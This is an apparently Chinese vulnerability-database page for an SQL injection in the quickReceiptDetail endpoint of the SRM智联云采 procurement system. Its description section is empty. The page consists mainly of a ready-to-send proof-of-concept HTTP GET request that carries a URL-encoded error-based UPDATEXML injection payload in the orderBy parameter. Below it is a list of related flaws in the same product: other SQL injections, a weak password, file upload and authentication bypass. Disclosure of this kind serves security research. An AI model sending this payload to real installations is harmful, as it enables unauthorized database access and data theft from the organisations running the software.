SRM智联云采系统 quickReceiptDetail 存在sql注入

漏洞描述

PoC代码

GET /adpweb/api/srm/delivery/quickReceiptDetail?orderBy=%28UPDATEXML%288058%2CCONCAT%280x2e%2C0x71707a7671%2C%28SELECT+%28ELT%288058%3D8058%2C1%29%29%29%2C0x71766a7671%29%2C3521%29%29 HTTP/1.1
Host: 
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/[REDACTED] Safari/537.36

相关漏洞推荐

• POC 智互联SRM智联云采系统 statusList SQL注入漏洞
• POC SRM智联云采系统 receiptDetail 存在sql注入
• SRM智联云采系统 statusList 存在sql注入
• 智互联(深圳)科技有限公司SRM智联云采系统inquiry存在SQL注入漏洞
• POC 智互联SRM智联云采系统 inquiry/getSuppliers SQL注入漏洞
• SRM智联云采系统 /adpweb/druid/submitLogin 弱口令漏洞
• SRM智联云采系统sql注入
• 智互联SRM智联云采系统 testService SQL注入漏洞
• POC 智互联SRM智联云采系统 receiptDetail SQL注入漏洞
• 智互联SRM智联云采系统任意文件上传漏洞
• POC 智互联SRM智联云采系统 quickReceiptDetail SQL注入漏洞
• SRM智联云采系统-存在身份认证绕过漏洞
• 智互联SRM智联云采系统 autologin 权限绕过漏洞